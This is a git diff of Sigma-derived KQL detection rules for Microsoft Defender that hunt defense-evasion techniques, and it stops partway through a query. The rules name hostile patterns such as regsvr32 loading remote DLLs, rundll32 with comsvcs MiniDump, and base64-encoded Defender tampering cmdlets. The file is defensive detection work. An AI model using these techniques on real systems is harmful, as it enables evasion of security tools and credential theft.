b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql index 476dd3f0..1e15f8da 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-13 -// Level: medium -// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.009 - -DeviceProcessEvents +// Title: Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-13 +// Level: medium +// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.009 + +DeviceProcessEvents | where (ProcessCommandLine contains ".dat" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".txt") and ((FolderPath endswith "\\Regsvcs.exe" or FolderPath endswith "\\Regasm.exe") or (ProcessVersionInfoOriginalFileName in~ ("RegSvcs.exe", "RegAsm.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql b/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql index 9877b57d..d7aa77df 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious GoogleUpdate Child Process -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-15 -// Level: high -// Description: Detects potentially suspicious child processes of "GoogleUpdate.exe" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Potentially Suspicious GoogleUpdate Child Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: high +// Description: Detects potentially suspicious child processes of "GoogleUpdate.exe" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" and (not((isnull(FolderPath) or (FolderPath contains "\\Google" or (FolderPath endswith "\\setup.exe" or FolderPath endswith "chrome_updater.exe" or FolderPath endswith "chrome_installer.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql b/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql index 2a629634..d224b552 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Office Document Executed From Trusted Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-21 -// Level: high -// Description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1202 - -DeviceProcessEvents +// Title: Potentially Suspicious Office Document Executed From Trusted Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-21 +// Level: high +// Description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents | where (((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe"))) and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\dopus.exe") and (ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Templates" or ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Word\\Startup\\" or ProcessCommandLine contains "\\Microsoft Office\\root\\Templates\\" or ProcessCommandLine contains "\\Microsoft Office\\Templates\\")) and (not((ProcessCommandLine endswith ".dotx" or ProcessCommandLine endswith ".xltx" or ProcessCommandLine endswith ".potx"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql b/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql index 198214a4..4d5eb074 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Ping/Copy Command Combination -// Author: X__Junior (Nextron Systems) -// Date: 2023-07-18 -// Level: medium -// Description: Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.004 - -DeviceProcessEvents +// Title: Potentially Suspicious Ping/Copy Command Combination +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-18 +// Level: medium +// Description: Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceProcessEvents | where (ProcessCommandLine contains "ping" and ProcessCommandLine contains "copy ") and (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (ProcessCommandLine contains " -y " or ProcessCommandLine contains " /y " or ProcessCommandLine contains " –y " or ProcessCommandLine contains " —y " or ProcessCommandLine contains " ―y ") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql index 0ccc5bc1..5258a128 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern -// Author: Florian Roth (Nextron Systems) -// Date: 2023-05-24 -// Level: medium -// Description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.010 - -DeviceProcessEvents +// Title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2023-05-24 +// Level: medium +// Description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 + +DeviceProcessEvents | where (ProcessCommandLine contains " /i" or ProcessCommandLine contains " -i") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains "ftp" or ProcessCommandLine contains "http") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql index dcfeef7f..a75a5257 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious Regsvr32 HTTP IP Pattern -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-11 -// Level: high -// Description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.010 -// False Positives: -// - FQDNs that start with a number such as "7-Zip" - -DeviceProcessEvents +// Title: Potentially Suspicious Regsvr32 HTTP IP Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-11 +// Level: high +// Description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - FQDNs that start with a number such as "7-Zip" + +DeviceProcessEvents | where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains " /i:http://1" or ProcessCommandLine contains " /i:http://2" or ProcessCommandLine contains " /i:http://3" or ProcessCommandLine contains " /i:http://4" or ProcessCommandLine contains " /i:http://5" or ProcessCommandLine contains " /i:http://6" or ProcessCommandLine contains " /i:http://7" or ProcessCommandLine contains " /i:http://8" or ProcessCommandLine contains " /i:http://9" or ProcessCommandLine contains " /i:https://1" or ProcessCommandLine contains " /i:https://2" or ProcessCommandLine contains " /i:https://3" or ProcessCommandLine contains " /i:https://4" or ProcessCommandLine contains " /i:https://5" or ProcessCommandLine contains " /i:https://6" or ProcessCommandLine contains " /i:https://7" or ProcessCommandLine contains " /i:https://8" or ProcessCommandLine contains " /i:https://9" or ProcessCommandLine contains " -i:http://1" or ProcessCommandLine contains " -i:http://2" or ProcessCommandLine contains " -i:http://3" or ProcessCommandLine contains " -i:http://4" or ProcessCommandLine contains " -i:http://5" or ProcessCommandLine contains " -i:http://6" or ProcessCommandLine contains " -i:http://7" or ProcessCommandLine contains " -i:http://8" or ProcessCommandLine contains " -i:http://9" or ProcessCommandLine contains " -i:https://1" or ProcessCommandLine contains " -i:https://2" or ProcessCommandLine contains " -i:https://3" or ProcessCommandLine contains " -i:https://4" or ProcessCommandLine contains " -i:https://5" or ProcessCommandLine contains " -i:https://6" or ProcessCommandLine contains " -i:https://7" or ProcessCommandLine contains " -i:https://8" or ProcessCommandLine contains " -i:https://9") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql index ae6e77df..204a73e8 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious Rundll32 Activity -// Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-01-16 -// Level: medium -// Description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 -// False Positives: -// - False positives depend on scripts and administrative tools used in the monitored environment - -DeviceProcessEvents +// Title: Potentially Suspicious Rundll32 Activity +// Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-01-16 +// Level: medium +// Description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents | where ((ProcessCommandLine contains "javascript:" and ProcessCommandLine contains ".RegisterXLL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURLA") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "FileProtocolHandler") or (ProcessCommandLine contains "zipfldr.dll" and ProcessCommandLine contains "RouteTheCall") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "ShellExec_RunDLL") or (ProcessCommandLine contains "mshtml.dll" and ProcessCommandLine contains "PrintHTML") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieframe.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "shdocvw.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "syssetup.dll" and ProcessCommandLine contains "SetupInfObjectInstallAction") or (ProcessCommandLine contains "setupapi.dll" and ProcessCommandLine contains "InstallHinfSection") or (ProcessCommandLine contains "pcwutl.dll" and ProcessCommandLine contains "LaunchApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbShortcut") or (ProcessCommandLine contains "scrobj.dll" and ProcessCommandLine contains "GenerateTypeLib" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "shimgvw.dll" and ProcessCommandLine contains "ImageView_Fullscreen" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "comsvcs.dll" and ProcessCommandLine contains "MiniDump")) and (not((((ProcessCommandLine contains "Shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".cpl") and InitiatingProcessCommandLine contains ".cpl" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe") or ProcessCommandLine contains "shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver" or (ProcessCommandLine endswith ".cpl\"," and ProcessCommandLine startswith "\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Windows\\System32\\" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql index 27e47681..7eff346b 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql @@ -1,13 +1,13 @@ -// Title: Potentially Suspicious Rundll32.EXE Execution of UDL File -// Author: @kostastsale -// Date: 2024-08-16 -// Level: medium -// Description: Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. -// Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011, attack.t1071 -// False Positives: -// - UDL files serve as a convenient and flexible tool for managing and testing database connections in various development and administrative scenarios. - -DeviceProcessEvents +// Title: Potentially Suspicious Rundll32.EXE Execution of UDL File +// Author: @kostastsale +// Date: 2024-08-16 +// Level: medium +// Description: Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. +// Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011, attack.t1071 +// False Positives: +// - UDL files serve as a convenient and flexible tool for managing and testing database connections in various development and administrative scenarios. + +DeviceProcessEvents | where ((ProcessCommandLine contains "oledb32.dll" and ProcessCommandLine contains ",OpenDSLFile " and (ProcessCommandLine contains "\\Users\\" and ProcessCommandLine contains "\\Downloads\\")) and ProcessCommandLine endswith ".udl") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql b/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql index 33c0cdf3..dd9a9245 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load -// Author: frack113 -// Date: 2023-02-17 -// Level: medium -// Description: Detects the image load of VSS DLL by uncommon executables -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.impact, attack.t1490 - -DeviceImageLoadEvents +// Title: Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load +// Author: frack113 +// Date: 2023-02-17 +// Level: medium +// Description: Detects the image load of VSS DLL by uncommon executables +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1490 + +DeviceImageLoadEvents | where FolderPath endswith "\\vsstrace.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\{"))))) and (not((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql b/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql index e0cea487..ed2f4df5 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious WDAC Policy File Creation -// Author: X__Junior -// Date: 2025-02-07 -// Level: medium -// Description: Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Administrators and security vendors could leverage WDAC, apply additional filters as needed. - -DeviceFileEvents +// Title: Potentially Suspicious WDAC Policy File Creation +// Author: X__Junior +// Date: 2025-02-07 +// Level: medium +// Description: Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Administrators and security vendors could leverage WDAC, apply additional filters as needed. + +DeviceFileEvents | where FolderPath contains "\\Windows\\System32\\CodeIntegrity\\" and (not((((InitiatingProcessCommandLine contains "ConvertFrom-CIPolicy -XmlFilePath" and InitiatingProcessCommandLine contains "-BinaryFilePath ") or InitiatingProcessCommandLine contains "CiTool --update-policy" or (InitiatingProcessCommandLine contains "Copy-Item -Path" and InitiatingProcessCommandLine contains "-Destination")) or (InitiatingProcessFolderPath endswith "\\Microsoft.ConfigurationManagement.exe" or InitiatingProcessFolderPath endswith "\\WDAC Wizard.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") or InitiatingProcessFolderPath =~ "System"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql b/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql index 6f2558fb..227154b9 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious Windows App Activity -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-12 -// Level: medium -// Description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Legitimate packages that make use of external binaries such as Windows Terminal - -DeviceProcessEvents +// Title: Potentially Suspicious Windows App Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-12 +// Level: medium +// Description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate packages that make use of external binaries such as Windows Terminal + +DeviceProcessEvents | where InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\" and ((ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Base64") or (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe")) and (not(((FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.SysinternalsSuite") or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql b/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql index 56626ac0..fccf216e 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql @@ -1,11 +1,11 @@ -// Title: Potentially Suspicious Wuauclt Network Connection -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-10-12 -// Level: medium -// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. -// One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceNetworkEvents +// Title: Potentially Suspicious Wuauclt Network Connection +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-12 +// Level: medium +// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. +// One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceNetworkEvents | where (InitiatingProcessCommandLine contains " /RunHandlerComServer" and InitiatingProcessFolderPath contains "wuauclt") and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine) or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.79.0.0/16") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11")) or (InitiatingProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or InitiatingProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (InitiatingProcessCommandLine contains ":\\Windows\\WinSxS\\" and InitiatingProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql b/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql index f545b0d6..b21d0472 100644 --- a/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql +++ b/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql @@ -1,10 +1,10 @@ -// Title: PowerShell Base64 Encoded FromBase64String Cmdlet -// Author: Florian Roth (Nextron Systems) -// Date: 2019-08-24 -// Level: high -// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1140, attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: PowerShell Base64 Encoded FromBase64String Cmdlet +// Author: Florian Roth (Nextron Systems) +// Date: 2019-08-24 +// Level: high +// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140, attack.execution, attack.t1059.001 + +DeviceProcessEvents | where ProcessCommandLine contains "OjpGcm9tQmFzZTY0U3RyaW5n" or ProcessCommandLine contains "o6RnJvbUJhc2U2NFN0cmluZ" or ProcessCommandLine contains "6OkZyb21CYXNlNjRTdHJpbm" or (ProcessCommandLine contains "OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA" or ProcessCommandLine contains "oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA" or ProcessCommandLine contains "6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql b/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql index 564d3923..a61d64da 100644 --- a/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql +++ b/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql @@ -1,10 +1,10 @@ -// Title: Powershell Base64 Encoded MpPreference Cmdlet -// Author: Florian Roth (Nextron Systems) -// Date: 2022-03-04 -// Level: high -// Description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceProcessEvents +// Title: Powershell Base64 Encoded MpPreference Cmdlet +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-04 +// Level: high +// Description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "QWRkLU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "BZGQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "U2V0LU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "TZXQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "YWRkLW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "hZGQtbXBwcmVmZXJlbmNlI" or ProcessCommandLine contains "c2V0LW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "zZXQtbXBwcmVmZXJlbmNlI") or (ProcessCommandLine contains "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or 